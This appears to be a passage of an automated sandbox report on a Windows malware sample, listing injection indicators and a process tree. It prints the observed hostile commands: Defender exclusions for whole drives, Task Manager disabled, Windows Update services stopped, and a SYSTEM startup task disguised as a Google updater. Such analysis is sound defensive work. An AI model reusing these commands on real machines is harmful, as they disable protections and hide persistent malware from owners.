Token: SeCreatePagefilePrivilege	1472	powershell.exe
Token: SeBackupPrivilege	1472	powershell.exe
Token: SeRestorePrivilege	1472	powershell.exe
Token: SeShutdownPrivilege	1472	powershell.exe
Token: SeDebugPrivilege	1472	powershell.exe
Token: SeSystemEnvironmentPrivilege	1472	powershell.exe
Token: SeRemoteShutdownPrivilege	1472	powershell.exe
Token: SeUndockPrivilege	1472	powershell.exe
Token: SeManageVolumePrivilege	1472	powershell.exe
Token: 33	1472	powershell.exe
Token: 34	1472	powershell.exe
Token: 35	1472	powershell.exe
Token: 36	1472	powershell.exe
Token: SeAssignPrimaryTokenPrivilege	2012	svchost.exe
Token: SeIncreaseQuotaPrivilege	2012	svchost.exe
Token: SeSecurityPrivilege	2012	svchost.exe
Token: SeTakeOwnershipPrivilege	2012	svchost.exe
Token: SeLoadDriverPrivilege	2012	svchost.exe
Token: SeSystemtimePrivilege	2012	svchost.exe
Token: SeBackupPrivilege	2012	svchost.exe
Token: SeRestorePrivilege	2012	svchost.exe
Token: SeShutdownPrivilege	2012	svchost.exe
Token: SeSystemEnvironmentPrivilege	2012	svchost.exe
Token: SeUndockPrivilege	2012	svchost.exe
Token: SeManageVolumePrivilege	2012	svchost.exe

Suspicious use of UnmapMainImage 2 IoCs

pid	Process
2636	svchost.exe
2636	svchost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4808 wrote to memory of 3480	4808	b9f8572fc7a8a6c2230434abb7190ae860f28386b3f0d5e5ee3754c6befca240.exe	83
PID 4808 wrote to memory of 3480	4808	b9f8572fc7a8a6c2230434abb7190ae860f28386b3f0d5e5ee3754c6befca240.exe	83
PID 4808 wrote to memory of 3480	4808	b9f8572fc7a8a6c2230434abb7190ae860f28386b3f0d5e5ee3754c6befca240.exe	83
PID 4808 wrote to memory of 4380	4808	b9f8572fc7a8a6c2230434abb7190ae860f28386b3f0d5e5ee3754c6befca240.exe	84
PID 4808 wrote to memory of 4380	4808	b9f8572fc7a8a6c2230434abb7190ae860f28386b3f0d5e5ee3754c6befca240.exe	84
PID 3480 wrote to memory of 4976	3480	Astral private DLL.exe	85
PID 3480 wrote to memory of 4976	3480	Astral private DLL.exe	85
PID 3480 wrote to memory of 4976	3480	Astral private DLL.exe	85
PID 4976 wrote to memory of 4912	4976	WScript.exe	86
PID 4976 wrote to memory of 4912	4976	WScript.exe	86
PID 4976 wrote to memory of 4912	4976	WScript.exe	86
PID 4912 wrote to memory of 3900	4912	cmd.exe	88
PID 4912 wrote to memory of 3900	4912	cmd.exe	88
PID 4912 wrote to memory of 3900	4912	cmd.exe	88
PID 4912 wrote to memory of 4892	4912	cmd.exe	89
PID 4912 wrote to memory of 4892	4912	cmd.exe	89
PID 4892 wrote to memory of 4552	4892	ServerComponenthostMonitorDll.exe	97
PID 4892 wrote to memory of 4552	4892	ServerComponenthostMonitorDll.exe	97
PID 4552 wrote to memory of 4016	4552	csc.exe	99
PID 4552 wrote to memory of 4016	4552	csc.exe	99
PID 4892 wrote to memory of 4948	4892	ServerComponenthostMonitorDll.exe	115
PID 4892 wrote to memory of 4948	4892	ServerComponenthostMonitorDll.exe	115
PID 4892 wrote to memory of 3036	4892	ServerComponenthostMonitorDll.exe	116
PID 4892 wrote to memory of 3036	4892	ServerComponenthostMonitorDll.exe	116
PID 4892 wrote to memory of 2784	4892	ServerComponenthostMonitorDll.exe	117
PID 4892 wrote to memory of 2784	4892	ServerComponenthostMonitorDll.exe	117
PID 4892 wrote to memory of 1692	4892	ServerComponenthostMonitorDll.exe	118
PID 4892 wrote to memory of 1692	4892	ServerComponenthostMonitorDll.exe	118
PID 4892 wrote to memory of 3964	4892	ServerComponenthostMonitorDll.exe	119
PID 4892 wrote to memory of 3964	4892	ServerComponenthostMonitorDll.exe	119
PID 4892 wrote to memory of 3980	4892	ServerComponenthostMonitorDll.exe	120
PID 4892 wrote to memory of 3980	4892	ServerComponenthostMonitorDll.exe	120
PID 4892 wrote to memory of 2752	4892	ServerComponenthostMonitorDll.exe	121
PID 4892 wrote to memory of 2752	4892	ServerComponenthostMonitorDll.exe	121
PID 4892 wrote to memory of 4984	4892	ServerComponenthostMonitorDll.exe	122
PID 4892 wrote to memory of 4984	4892	ServerComponenthostMonitorDll.exe	122
PID 4892 wrote to memory of 3644	4892	ServerComponenthostMonitorDll.exe	123
PID 4892 wrote to memory of 3644	4892	ServerComponenthostMonitorDll.exe	123
PID 4892 wrote to memory of 4764	4892	ServerComponenthostMonitorDll.exe	124
PID 4892 wrote to memory of 4764	4892	ServerComponenthostMonitorDll.exe	124
PID 4892 wrote to memory of 400	4892	ServerComponenthostMonitorDll.exe	125
PID 4892 wrote to memory of 400	4892	ServerComponenthostMonitorDll.exe	125
PID 4892 wrote to memory of 1728	4892	ServerComponenthostMonitorDll.exe	126
PID 4892 wrote to memory of 1728	4892	ServerComponenthostMonitorDll.exe	126
PID 4892 wrote to memory of 1696	4892	ServerComponenthostMonitorDll.exe	127
PID 4892 wrote to memory of 1696	4892	ServerComponenthostMonitorDll.exe	127
PID 4892 wrote to memory of 3968	4892	ServerComponenthostMonitorDll.exe	128
PID 4892 wrote to memory of 3968	4892	ServerComponenthostMonitorDll.exe	128
PID 4892 wrote to memory of 3332	4892	ServerComponenthostMonitorDll.exe	129
PID 4892 wrote to memory of 3332	4892	ServerComponenthostMonitorDll.exe	129
PID 4892 wrote to memory of 4396	4892	ServerComponenthostMonitorDll.exe	130
PID 4892 wrote to memory of 4396	4892	ServerComponenthostMonitorDll.exe	130
PID 4892 wrote to memory of 1988	4892	ServerComponenthostMonitorDll.exe	131
PID 4892 wrote to memory of 1988	4892	ServerComponenthostMonitorDll.exe	131
PID 4892 wrote to memory of 5052	4892	ServerComponenthostMonitorDll.exe	132
PID 4892 wrote to memory of 5052	4892	ServerComponenthostMonitorDll.exe	132
PID 4892 wrote to memory of 5072	4892	ServerComponenthostMonitorDll.exe	150
PID 4892 wrote to memory of 5072	4892	ServerComponenthostMonitorDll.exe	150
PID 5072 wrote to memory of 4916	5072	cmd.exe	153
PID 5072 wrote to memory of 4916	5072	cmd.exe	153
PID 5072 wrote to memory of 5228	5072	cmd.exe	154
PID 5072 wrote to memory of 5228	5072	cmd.exe	154
PID 5072 wrote to memory of 5604	5072	cmd.exe	160
PID 5072 wrote to memory of 5604	5072	cmd.exe	160

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:612
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:64

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:668

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:944

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:528

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:724

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Drops file in System32 directory
PID:1100
- C:\Windows\system32\taskhostw.exe
  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  2⤵
  PID:3100
- C:\Program Files\Google\Chrome\updater.exe
  "C:\Program Files\Google\Chrome\updater.exe"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Drops file in Program Files directory
  PID:4280

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1124

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1136

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1168

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
PID:1188

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1332

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1348

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1376
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:3048

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1432

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1588

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1600

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1640

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1708

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1744

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1788

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1864

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2012

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:2024

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:2036

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1028

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1908

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2156

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2260

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2320

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2488

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2496

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
- Suspicious use of UnmapMainImage
PID:2636

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2664

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2696

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2712

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2772

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:2904

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2624

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:3244

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3388

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3472
- C:\Users\Admin\AppData\Local\Temp\b9f8572fc7a8a6c2230434abb7190ae860f28386b3f0d5e5ee3754c6befca240.exe
  "C:\Users\Admin\AppData\Local\Temp\b9f8572fc7a8a6c2230434abb7190ae860f28386b3f0d5e5ee3754c6befca240.exe"
  2⤵
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4808
- - C:\Users\Admin\AppData\Local\Temp\Astral private DLL.exe
    "C:\Users\Admin\AppData\Local\Temp\Astral private DLL.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
    PID:3480
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\containerperf\mtmIdTw4RygS3trJMnWvLFqF6dzRpLwhZvwqEPqaKDGsnR5lufKuCs3iyL.vbe"
      4⤵
      Checks computer location settings
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:4976
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\containerperf\OHYKCXOXzFm1PCyBPS6uXfmto4OWxv9XE4FGIVj.bat" "
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:4912
      - C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        6⤵
        System Location Discovery: System Language Discovery
        Modifies registry key
        
        PID:3900
      - C:\containerperf\ServerComponenthostMonitorDll.exe
        
        "C:\containerperf/ServerComponenthostMonitorDll.exe"
        6⤵
        Modifies WinLogon for persistence
        Checks computer location settings
        Executes dropped EXE
        Adds Run key to start application
        Drops file in Program Files directory
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4892
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4pzibiiw\4pzibiiw.cmdline"
        7⤵
        Drops file in System32 directory
        Suspicious use of WriteProcessMemory
        
        PID:4552
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB9F9.tmp" "c:\Windows\System32\CSC42BBDE5C5DD497CBA9CA7C2A7BC9B6.TMP"
        8⤵
        
        PID:4016
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:4948
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:3036
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/containerperf/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:2784
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:1692
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:3964
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:3980
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:2752
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:4984
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:3644
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:4764
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:400
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:1728
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Reference Assemblies\dllhost.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:1696
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\containerperf\csrss.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:3968
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\containerperf\dllhost.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:3332
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\services.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:4396
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Multimedia Platform\wininit.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:1988
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\containerperf\ServerComponenthostMonitorDll.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:5052
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\KgNMYgAYwL.bat"
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:5072
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        8⤵
        
        PID:4916
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        8⤵
        
        PID:5228
        
        C:\Program Files (x86)\Reference Assemblies\dllhost.exe
        
        "C:\Program Files (x86)\Reference Assemblies\dllhost.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:5604
- - C:\Users\Admin\AppData\Local\Temp\twain_32.exe
    "C:\Users\Admin\AppData\Local\Temp\twain_32.exe"
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Drops file in Program Files directory
    PID:4380
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:5348
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  PID:1084
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:2196
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:5132
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:4980
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:3716
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:1260
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:1572
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:4316
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:4080
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:2080
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:4136
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1008
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#amvyyojjq#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:1472
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4988
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
  2⤵
  PID:5292
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4244
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:1992
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4412
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  PID:5056
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1072
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:4176
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:3568
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:5548
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:5740
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:5700
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:4576
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5304
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    - Power Settings
    PID:2020
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    - Power Settings
    PID:6072
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    - Power Settings
    PID:5092
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    - Power Settings
    PID:4244
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  PID:1088
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#amvyyojjq#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:1060
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3688
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  PID:4744
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  - Modifies data under HKEY_USERS
  PID:4248

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3588

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3792

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3956

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4212

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:5020

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:5108

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:1620

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:1624

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:4124

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:3992

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1388

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4656

C:\Windows\system32\svchost.exe
